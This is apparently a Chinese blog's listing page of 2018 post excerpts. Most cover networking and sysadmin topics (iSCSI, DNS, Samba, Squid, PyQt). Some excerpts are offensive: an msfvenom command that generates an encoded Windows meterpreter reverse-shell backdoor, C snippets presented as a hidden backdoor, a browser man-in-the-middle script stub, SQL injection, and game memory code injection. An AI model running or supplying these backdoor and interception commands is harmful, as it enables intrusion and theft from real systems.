摘要: iSCSI 互联网小型计算机系统接口是由IBM下属的两大研发机构AImaden和Haifa研究中心共同开发的,是一个供硬件设备使用的、可在IP协议上层运行的SCSI指令集,是一种开放的基于IP协议的工业技术标准.该协议可以用TCP/IP对SCSI指令进行封装,使得这些指令能够通过基于IP网络进行传输,从而实现SCSI和TCP/IP协议的连接.对于局域网环境中的用户来说,采用该标准只需要不多的投资就可以方便、快捷地对信息和数据进行交互式传输及管理. 阅读全文
posted @ 2018-11-12 17:32 lyshark 阅读(2326) 评论(0) 推荐(0)
摘要: DNS 域名系统,万维网上作为域名和IP地址相互映射的一个分布式数据库,能够使用户更方便的访问互联网,而不用去记住能够被机器直接读取的IP数串。通过域名,最终得到该域名对应的IP地址的过程叫做域名解析(或主机名解析)。DNS协议运行在UDP协议之上,使用端口号UDP 53号端口作为数据通信端口(域名解析),使用TCP53号端口实现数据同步(主从同步)。 阅读全文
posted @ 2018-11-12 17:29 lyshark 阅读(1211) 评论(0) 推荐(0)
摘要: SMB服务消息块协议,指在解决局域网内的文件或打印机等资源的共享问题,这也使得在多个主机之间共享文件变得越来越简单,Samba服务已经成为了,Linux系统与Windows系统之间数据传输的最佳选择. 阅读全文
posted @ 2018-11-12 17:27 lyshark 阅读(1794) 评论(0) 推荐(0)
摘要: LAMP动态网站部署架构是由一套 Linux+Apache+MySQL+PHP 组成的动态网站系统解决方案.LNMP动态网站部署架构是由一套 Linux+Nginx+MySQL+PHP 组成的动态网站系统解决方案.编译安装费时费力有时还会出错误,下面我们将通过Yum仓库,快速构建LANMP网站环境. 阅读全文
posted @ 2018-11-12 17:26 lyshark 阅读(718) 评论(0) 推荐(0)
摘要: Squid是Linux系统中最为流行的一款高性能代理服务软件,通常用作Web网站的前置缓存服务,能够代替用户向网站服务器请求页面数据并进行缓存.简单来说,Squid服务程序会按照收到的用户请求向网站源服务器请求页面,图片等所需的数据,并将服务器返回的数据存储在运行Squid服务程序的服务器上.当有用户再请求相同的数据时,则可以直接将存储服务器本地的数据交付给用户,这样不仅减少了用户的等待时间,还缓解了网站服务器的负载压力. 阅读全文
posted @ 2018-11-12 17:24 lyshark 阅读(708) 评论(0) 推荐(0)
摘要: DHCP 动态主机配置协议是一个局域网的网络协议,使用UDP协议工作,主要有两个用途:给内部网络或网络服务供应商自动分配IP地址、子网掩码、网关以及DNS等tcp/ip信息,给用户或者内部网络管理员作为对所有计算机作中央管理的方法. 阅读全文
posted @ 2018-11-12 17:18 lyshark 阅读(1856) 评论(0) 推荐(0)
摘要: SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不 阅读全文
posted @ 2018-10-23 16:29 lyshark 阅读(4225) 评论(0) 推荐(0)
摘要: SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不 阅读全文
posted @ 2018-10-23 15:31 lyshark 阅读(2671) 评论(0) 推荐(0)
摘要: 通过向游戏中注入一段特殊的汇编代码,实现自动获取动态地址,省略找基址的麻烦。该方法适用于游戏基址层数过多无法直接获取到基址,游戏根本无法找到基址。本地CALL就是程序中的过程调用,通过调用已知的本地CALL即可实现某些变态功能,这些变态功能往往是通过修改数值参数也做不到的,接下来我们将通过遍历阳光产生的时间,寻找阳光产生的本地Call,并使用代码注入器注入,自定义生成阳光。通过基址加偏移的方式我们可以找到游戏中的指定参数,但这种找基址的方式并不是白用百灵的,在一些网络游戏中基址加密后根本无从下手,如果此时我们需要在程序中打补丁该如何定位到我们所需要的指令上呢,接下来将介绍一种全新的找地址方式,特征码定位技术。 阅读全文
posted @ 2018-08-08 17:38 lyshark 阅读(29157) 评论(0) 推荐(5)
摘要: 创建数据库 1.创建一个lyshark数据库. MariaDB [(none)]> create database lyshark charset utf8; Query OK, 1 row affected (0.00 sec) 2.查看创建好的数据库lyshark的定义 MariaDB [(no 阅读全文
posted @ 2018-07-03 11:05 lyshark 阅读(638) 评论(0) 推荐(0)
摘要: PyQt是一个创建GUI应用程序的工具包。它是Python编程语言和Qt库的成功融合。Qt库是最强大的库之一。PyQt是由Phil Thompson 开发。 阅读全文
posted @ 2018-06-15 15:07 lyshark 阅读(6871) 评论(0) 推荐(2)
摘要: #pragma comment(lib,"ws2_32.lib") #ifdef _MSC_VER #pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" ) #endif #include <winso 阅读全文
posted @ 2018-06-11 19:43 lyshark 阅读(1424) 评论(0) 推荐(0)
摘要: 使用vc6编译器编译后门,并运行 #pragma comment(lib,"ws2_32.lib") #ifdef _MSC_VER #pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" ) #endi 阅读全文
posted @ 2018-06-11 18:17 lyshark 阅读(1042) 评论(0) 推荐(0)
摘要: 服务端(server) #include <stdio.h> #include <winsock2.h> #pragma comment(lib,"ws2_32.lib") //把ws2_32.lib加到Link页的连接库 #define PORT 15001 //通信的端口(指服务器端) #def 阅读全文
posted @ 2018-06-09 10:04 lyshark 阅读(2344) 评论(0) 推荐(1)
摘要: 实现简单的Socket通信 服务端代码(Server) #include <stdio.h> #include <winsock2.h> #pragma comment(lib,"ws2_32.lib") #define PORT 9999 int main() { WSADATA WSAData; 阅读全文
posted @ 2018-06-09 10:01 lyshark 阅读(4210) 评论(1) 推荐(2)
摘要: #include <windows.h> #include <tlhelp32.h> //进程快照函数头文件 #include <stdio.h> bool getProcess(const char *procressName) //此函数进程名不区分大小写 { char pName[MAX_PA 阅读全文
posted @ 2018-06-09 09:57 lyshark 阅读(4953) 评论(0) 推荐(0)
摘要: 遍历进程 #include <windows.h> #include <tlhelp32.h> //进程快照函数头文件 #include <stdio.h> int main() { int countProcess=0; //当前进程数量计数变量 PROCESSENTRY32 currentPro 阅读全文
posted @ 2018-06-09 09:57 lyshark 阅读(1914) 评论(0) 推荐(0)
摘要: #include <string> #include<iostream> #include<windows.h> #include <sstream> using namespace std; string WORDToString(WORD w) { char tmpbuff[16]; sprin 阅读全文
posted @ 2018-06-09 09:56 lyshark 阅读(995) 评论(0) 推荐(0)
摘要: #include<winsock2.h> #include<iostream> #include<string> using namespace std; #pragma comment(lib, "WS2_32.lib") string getIP() { WSADATA WSAData; cha 阅读全文
posted @ 2018-06-09 09:55 lyshark 阅读(1777) 评论(0) 推荐(1)
摘要: #include<stdio.h> #include<winsock2.h> //该头文件需在windows.h之前 #include<windows.h> #include<string> #include<iostream> #pragma comment(lib,"ws2_32.lib") u 阅读全文
posted @ 2018-06-09 09:54 lyshark 阅读(4529) 评论(0) 推荐(1)
摘要: Numpy是Python开源的数值计算扩展,可用来存储和处理大型矩阵,比Python自身数据结构要高效;matplotlib是一个Python的图像框架,使用其绘制出来的图形效果和MATLAB下绘制的图形类似。 阅读全文
posted @ 2018-06-07 21:11 lyshark 阅读(4322) 评论(0) 推荐(1)
摘要: 文件内容差异对比方法 使用diffie模块实现文件内容差异对比。dmib作为 Python的标准库模块,无需安装,作用是对比文本之间的差异,且支持输出可读性比较强的HTML文档,与 Linux下的dif命令相似。我们可以使用 diffie对比代码、配置文件的差别,在版本控制方面是非常有用。 Pyth 阅读全文
posted @ 2018-06-07 13:01 lyshark 阅读(957) 评论(0) 推荐(1)
摘要: 系统性能信息模块psutil psutil能够轻松实现获取系统运行的进程和系统利用率包括(CPU,内存,磁盘 和网络)等。主要用于系统监控。对于系统维护来说是个不错的模块。 wget https://files.pythonhosted.org/packages/14/a2/8ac7dda36eac 阅读全文
posted @ 2018-06-07 09:06 lyshark 阅读(1616) 评论(0) 推荐(0)
摘要: nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统。 阅读全文
posted @ 2018-06-04 15:07 lyshark 阅读(1657) 评论(0) 推荐(0)
摘要: 生成windows后门 1.首先生成后门 [root@localhost ~]# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.1.1 lport=6666 -f exe > 阅读全文
posted @ 2018-06-04 13:56 lyshark 阅读(5815) 评论(0) 推荐(1)
摘要: Cheat Engine 一般简称CE,是一个开放源代码的游戏修改软件,其功能包括,内存扫描、十六进制编辑器、调试工具,Cheat Engine 自身附带了辅助制作工具,可以用它直接生成窗体工具,CE可以说是目前最优秀的修改器不是之一,这个工具绝对值得你去学习,只要花一点时间就够了。 阅读全文
posted @ 2018-05-30 13:21 lyshark 阅读(227829) 评论(0) 推荐(6)
摘要: 1.配置服务器,开启注释 vim /etc/httpd/conf/httpd.conf 292 # (You will also need to add "ExecCGI" to the "Options" directive.) 293 # 294 AddHandler cgi-script .c 阅读全文
posted @ 2018-05-29 12:11 lyshark 阅读(1334) 评论(0) 推荐(0)
摘要: 通常一个DNS数据包,客户端发送DNSQR请求包,服务器发送DNSRR响应包。一个DNSQR包含有查询的名称qname、查询的类型qtype、查询的类别qclass。一个DNSRR包含有资源记录名名称rrname、类型type、资源记录类别rtype、TTL等等。 阅读全文
posted @ 2018-05-28 22:48 lyshark 阅读(3571) 评论(0) 推荐(0)
摘要: 该工具第一是查询执行参数`-a Search xxx.com`第二是爆破`-a Blast domain wordlist`,工具同样可以使用DNS域名的枚举,和上面的区别就在于该方法使用了DNS迭代查询. 阅读全文
posted @ 2018-05-28 22:32 lyshark 阅读(3233) 评论(0) 推荐(0)
摘要: 基于浏览器的中间人攻击 #coding=utf-8 import win32com.client import time import urlparse import urllib data_receiver = "http://localhost:8080/" target_sites = {} 阅读全文
posted @ 2018-05-28 22:16 lyshark 阅读(1441) 评论(0) 推荐(0)